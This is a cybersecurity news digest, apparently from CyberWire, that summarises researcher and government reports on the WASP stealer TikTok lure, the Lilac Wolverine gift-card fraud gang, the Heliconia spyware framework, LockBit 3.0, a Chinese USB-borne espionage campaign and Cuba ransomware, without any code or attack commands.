At a glance.
- Adversarial activity.
- Risk and trend reports.
- Sandworm renews ransomware activity against Ukrainian targets.
- Internet service in Ukraine and Moldova interrupted by strikes against Ukraine's power grid.
- Google announces new support for Ukraine.
- DDoSing the Vatican.
- European Parliament sustains brief DDoS attack.
- Iran's Fars news agency reports cyberattack.
- Killnet claims to have counted coup against the White House.
- DDoS as a holiday-season threat to e-commerce.
- From criminals to hacktivists.
- Predictions for 2023.
Adversarial activity of the week.
Attackers are exploiting a popular TikTok challenge to distribute malware, according to researchers at Checkmarx. A trending TikTok challenge involves posing naked using a filter called “Invisible Body,” which (they say) replaces the user’s body with a blurred outline. Attackers capitalized on this by purporting to offer another filter that could remove the Invisible Body filter and expose the user’s naked body. This filter is fake, and will install the WASP stealer malware. (If you fall for this, you probably fell for the X-Ray Specs ads in the old comic books.) The researchers observed that more than 30,000 users have joined the attackers’ Discord server so far. BleepingComputer notes that the GitHub repo hosting the malicious code achieved a trending status on GitHub. For more on this cyber-version of X-Ray Specs, see CyberWire Pro.
Abnormal Security describes a business email compromise (BEC) gang dubbed “Lilac Wolverine” that’s launching widespread campaigns asking for gift cards. The threat actor begins by compromising a personal email account and copying its contact list. The attackers then set up an email account with the same address as the compromised account, but on a different provider (usually Gmail, Hotmail, or Outlook). They’ll then use this account to send emails to the compromised account’s contacts. If the recipient is reluctant to send the money, the attackers will explain that “the fictional birthday friend also has cancer or just lost loved ones to COVID-19—or both.” The researchers note that gift card requests are the most popular form of payment in BEC attacks, despite offering a lower payout per attack. For more on Lilac Wolverine, see CyberWire Pro.
Google’s Threat Analysis Group (TAG) has published a report on a commercial spyware framework developed by a Barcelona-based company, Variston IT. The framework, called “Heliconia,” exploited vulnerabilities in Chrome, Firefox, and Microsoft Defender. While the vulnerabilities have since been patched, TAG says “it appears likely these were utilized as zero-days in the wild.” An anonymous submission to the Chrome bug reporting program tipped the researchers off to three distinct frameworks. Heliconia Noise is a “web framework for deploying a Chrome renderer exploit, followed by a Chrome sandbox escape and agent installation,” while Heliconia Soft is “a web framework that deploys a PDF containing a Windows Defender exploit.” Heliconia Files offers “a fully documented Firefox exploit chain for Windows and Linux.” See CyberWire Pro for more on Heliconia.
Sophos Wednesday reported on its reverse engineering of LockBit 3.0 (also known as LockBit Black). It appears that the ransomware's operators are experimenting with making their malware wormable, that is, giving it functionality that would enable it to spread by itself through and across networks. Their research also offers some support to other security experts who've suspected a connection between LockBit and the BlackMatter ransomware family. They "found a number of similarities which strongly suggest that LockBit 3.0 reuses code from BlackMatter," especially in its anti-debugging, obfuscation, API resolution, printer-attack, and shadow-copy deletion features. There are other similarities as well, and Sophos points out that much of LockBit 3.0's tooling mimics what a legitimate penetration tester might use.
Mandiant reports that cyberespionage it associates with Chinese intelligence services is currently active against targets in Southeast Asia, particularly in the Philippines. The campaign uses compromised USB drives as a principal attack vector, thus counting on users delivering the malware across whatever protective air gaps may exist. The principal tools it uses are MISTCLOAK (a launcher written in C++, BLUEHAZE (another launcher, this one written in C/C++ "that launches a copy of NCAT to create a reverse shell to a hardcoded command and control"), DARKDEW (a dropper able to infect removable drives), and NCAT (useful to "upload or download files, create backdoors or reverse shells, and tunnel traffic to evade network controls"). The campaign may have been in progress since September 2021, and Mandiant reads it as an example of Chinese determination to establish and maintain persistence in targets of interest.
The Cuba ransomware operations, the FBI and the US Cybersecurity and Infrastructure Security Agency (CISA) warned Thursday, have taken in aggregate some $60 million from more than a hundred victims. The gang, which has no connection with the country, government, or island of Cuba, has recently been deploying RomCom malware. This is a custom remote access Trojan (RAT) used for command-and-control. The gang also seems to be "leveraging," as CISA and the FBI put it, Industrial Spy ransomware against its victims. An account of indicators of compromise and appropriate defensive measures appear in the alert.